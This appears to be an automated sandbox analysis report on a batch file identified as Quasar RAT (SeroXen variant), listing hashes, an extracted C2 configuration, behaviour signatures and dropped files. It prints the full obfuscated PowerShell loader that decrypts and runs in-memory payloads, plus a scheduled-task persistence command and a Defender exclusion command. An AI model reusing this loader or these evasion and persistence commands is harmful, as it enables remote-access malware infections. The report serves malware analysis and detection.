Analysis
-
max time kernel
93s -
max time network
124s -
platform
windows10-2004_x64 -
resource
win10v2004-20240426-en -
resource tags
-
submitted
28-04-2024 16:13
General
-
Target
rename me.bat
-
Size
328KB
-
MD5
aeb5d5210a55384c6019bc889ab2712a
-
SHA1
524094d4dc90b48c110e24b26aa6cebbf15937cf
-
SHA256
3f077245d055648ee67c8597d813805f43a1a750abf17b6597ec49e6e61bba1e
-
SHA512
2e71352ad66c150a217784f0eeec50d001eef3fa60be33dd98bec3503dc0356b8e6b6df4042e1bddfb4933b25ba5c9a4202450eb6604ae00bb48a1495f54910f
-
SSDEEP
6144:v49D8DR1G9Pj1pP+irNTVDxmev+lcvhEvLpPxJMRLRsvjoOo50AqPJNIA3OiL5O9:v49DuPGtjP+irnDIev+lcv2pxLjoOoOq
Malware Config
Extracted
quasar
3.1.5
SeroXen
147.185.221.19:33587
$Sxr-2rfrZTKITtK0P0zGYG
-
encryption_key
Yr0YpBPNd3kXsl43jZMx
-
install_name
$sxr-sdinwn.exe
-
log_directory
$sxr
-
reconnect_delay
3000
-
startup_key
$sxr-metsha
-
subdirectory
sxr
Signatures
-
Quasar RAT
Quasar is an open source Remote Access Tool.
-
Quasar payload 1 IoCs
-
Blocklisted process makes network request 1 IoCs
-
Drops file in Drivers directory 1 IoCs
-
Executes dropped EXE 1 IoCs
-
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
-
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Gathers network information 2 TTPs 1 IoCs
Uses commandline utility to view network configuration.
-
Suspicious behavior: EnumeratesProcesses 6 IoCs
-
Suspicious use of AdjustPrivilegeToken 3 IoCs
-
Suspicious use of WriteProcessMemory 15 IoCs
Processes
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\rename me.bat"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('c9cTBUxEQ3bkhNltovJO4VlBnFPtuZDAn3tKbTZM170='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Q2umC619B9pCpnnAKCTQLg=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $FSGQo=New-Object System.IO.MemoryStream(,$param_var); $zrACb=New-Object System.IO.MemoryStream; $JlDkU=New-Object System.IO.Compression.GZipStream($FSGQo, [IO.Compression.CompressionMode]::Decompress); $JlDkU.CopyTo($zrACb); $JlDkU.Dispose(); $FSGQo.Dispose(); $zrACb.Dispose(); $zrACb.ToArray();}function execute_function($param_var,$param2_var){ $abVXg=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $NJXTr=$abVXg.EntryPoint; $NJXTr.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Local\Temp\rename me.bat';$EvryY=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\rename me.bat').Split([Environment]::NewLine);foreach ($rkrqt in $EvryY) { if ($rkrqt.StartsWith(':: ')) { $xqxsV=$rkrqt.Substring(3); break; }}$payloads_var=[string[]]$xqxsV.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));2⤵
- Blocklisted process makes network request
- Drops file in Drivers directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\schtasks.exe"schtasks" /create /tn "$sxr-metsha" /sc ONLOGON /tr "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" /rl HIGHEST /f3⤵
- Creates scheduled task(s)
-
C:\Users\Admin\AppData\Roaming\sxr\$sxr-sdinwn.exe"C:\Users\Admin\AppData\Roaming\sxr\$sxr-sdinwn.exe"3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath (Get-Item -LiteralPath $env:SystemRoot).Root"3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\ipconfig.exe"C:\Windows\System32\ipconfig.exe" /flushdns3⤵
- Gathers network information
Network
MITRE ATT&CK Matrix ATT&CK v13
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.logFilesize
2KB
MD5fa34232314a6f718c9b6f184f8257dd4
SHA17900e7422a76afca82b7530f88f40cf5b9a6b91a
SHA256f0e7191fc1e4d0bd3dc321ce565bc1d6deac3edc0fe29e798ca9aa5237e47ec5
SHA51271fdcce1f45adc6ce8a6bd1210a3deddc9067524e18ae4b2a101dcb55275fb21a2985658ddca0139d8d25bd29b3689f4c8bc176da1ebf44937c1a88422a524ef
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
19KB
MD593369aaf7787a5da5c9e8c111e789bf5
SHA17471347c3a30cc6d0aaae70e0ea09a7ff0b90522
SHA256b80877b66037dc4b0e27a1f26009764daa614e5001ee5d70b5cf0051cbb760c1
SHA5122ace417a6ca096cf86d5d6e02110555ca5856c0defd558a0ed8e752b0e323618d33d2e5714ccbd10678ec89a8f68248dce474e6e996e0759410c0c8002f3264b
-
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_4oxjm0mr.msq.ps1Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
C:\Users\Admin\AppData\Roaming\sxr\$sxr-sdinwn.exeFilesize
423KB
MD5c32ca4acfcc635ec1ea6ed8a34df5fac
SHA1f5ee89bb1e4a0b1c3c7f1e8d05d0677f2b2b5919
SHA25673a3c4aef5de385875339fc2eb7e58a9e8a47b6161bdc6436bf78a763537be70
SHA5126e43dca1b92faace0c910cbf9308cf082a38dd39da32375fad72d6517dea93e944b5e5464cf3c69a61eabf47b2a3e5aa014d6f24efa1a379d4c81c32fa39ddbc
-
memory/1052-88-0x0000000004DA0000-0x0000000004DB0000-memory.dmpFilesize
64KB
-
memory/1052-89-0x0000000004DA0000-0x0000000004DB0000-memory.dmpFilesize
64KB
-
memory/1052-87-0x00000000749A0000-0x0000000075150000-memory.dmpFilesize
7.7MB
-
memory/1052-57-0x0000000007360000-0x00000000073D6000-memory.dmpFilesize
472KB
-
memory/1052-56-0x00000000071C0000-0x0000000007204000-memory.dmpFilesize
272KB
-
memory/1052-36-0x0000000004DA0000-0x0000000004DB0000-memory.dmpFilesize
64KB
-
memory/1052-37-0x0000000004DA0000-0x0000000004DB0000-memory.dmpFilesize
64KB
-
memory/1052-35-0x00000000749A0000-0x0000000075150000-memory.dmpFilesize
7.7MB
-
memory/2356-71-0x0000000007660000-0x000000000767E000-memory.dmpFilesize
120KB
-
memory/2356-58-0x0000000007540000-0x00000000075D6000-memory.dmpFilesize
600KB
-
memory/2356-85-0x00000000749A0000-0x0000000075150000-memory.dmpFilesize
7.7MB
-
memory/2356-81-0x0000000007A60000-0x0000000007A68000-memory.dmpFilesize
32KB
-
memory/2356-80-0x0000000007A70000-0x0000000007A8A000-memory.dmpFilesize
104KB
-
memory/2356-79-0x0000000007A30000-0x0000000007A44000-memory.dmpFilesize
80KB
-
memory/2356-78-0x0000000007A20000-0x0000000007A2E000-memory.dmpFilesize
56KB
-
memory/2356-77-0x00000000079E0000-0x00000000079F1000-memory.dmpFilesize
68KB
-
memory/2356-73-0x0000000007870000-0x000000000787A000-memory.dmpFilesize
40KB
-
memory/2356-34-0x00000000051A0000-0x00000000051B0000-memory.dmpFilesize
64KB
-
memory/2356-33-0x00000000749A0000-0x0000000075150000-memory.dmpFilesize
7.7MB
-
memory/2356-72-0x00000000076D0000-0x0000000007773000-memory.dmpFilesize
652KB
-
memory/2356-60-0x0000000007680000-0x00000000076B2000-memory.dmpFilesize
200KB
-
memory/2356-61-0x00000000707C0000-0x000000007080C000-memory.dmpFilesize
304KB
-
memory/2356-59-0x00000000068C0000-0x00000000068E2000-memory.dmpFilesize
136KB
-
memory/3368-26-0x00000000052A0000-0x00000000052B2000-memory.dmpFilesize
72KB
-
memory/3368-3-0x0000000005640000-0x0000000005C68000-memory.dmpFilesize
6.2MB
-
memory/3368-21-0x0000000006A40000-0x0000000006A48000-memory.dmpFilesize
32KB
-
memory/3368-17-0x0000000006450000-0x000000000646E000-memory.dmpFilesize
120KB
-
memory/3368-18-0x0000000006480000-0x00000000064CC000-memory.dmpFilesize
304KB
-
memory/3368-19-0x0000000007CA0000-0x000000000831A000-memory.dmpFilesize
6.5MB
-
memory/3368-0-0x00000000749A0000-0x0000000075150000-memory.dmpFilesize
7.7MB
-
memory/3368-6-0x0000000005ED0000-0x0000000005F36000-memory.dmpFilesize
408KB
-
memory/3368-2-0x0000000004FC0000-0x0000000004FD0000-memory.dmpFilesize
64KB
-
memory/3368-13-0x0000000005F40000-0x0000000006294000-memory.dmpFilesize
3.3MB
-
memory/3368-20-0x00000000069F0000-0x0000000006A0A000-memory.dmpFilesize
104KB
-
memory/3368-25-0x0000000007940000-0x00000000079D2000-memory.dmpFilesize
584KB
-
memory/3368-24-0x00000000088D0000-0x0000000008E74000-memory.dmpFilesize
5.6MB
-
memory/3368-23-0x00000000077B0000-0x000000000781E000-memory.dmpFilesize
440KB
-
memory/3368-5-0x0000000005E60000-0x0000000005EC6000-memory.dmpFilesize
408KB
-
memory/3368-4-0x0000000005CC0000-0x0000000005CE2000-memory.dmpFilesize
136KB
-
memory/3368-22-0x0000000007650000-0x0000000007690000-memory.dmpFilesize
256KB
-
memory/3368-27-0x0000000008360000-0x000000000839C000-memory.dmpFilesize
240KB
-
memory/3368-1-0x0000000004FD0000-0x0000000005006000-memory.dmpFilesize
216KB
-
memory/3368-76-0x00000000749A0000-0x0000000075150000-memory.dmpFilesize
7.7MB